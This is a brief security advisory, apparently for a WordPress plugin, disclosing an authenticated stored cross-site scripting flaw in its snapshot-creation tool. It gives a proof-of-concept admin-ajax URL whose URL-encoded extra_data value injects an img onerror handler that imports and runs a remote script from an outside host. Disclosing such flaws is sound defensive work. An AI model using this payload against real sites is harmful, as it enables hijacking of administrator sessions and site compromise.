The plugin did not sanitise or escape its extra_data parameter when creating a snapshot via the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue
PoC | Authenticated Persistent XSS | Enter snapshot name or brief description:
https://example.com/wp-admin/admin-ajax.php?action=wp_reset_run_tool&_ajax_nonce=394f497fd0&tool=create_snapshot&extra_data=%3Cimg%20src%3Dx%20onerror%3D%3Bimport(%60%2F%2Fm0ze.ru%2Fpayload%2Fa.js%60)%3B%20%2F%2F%3E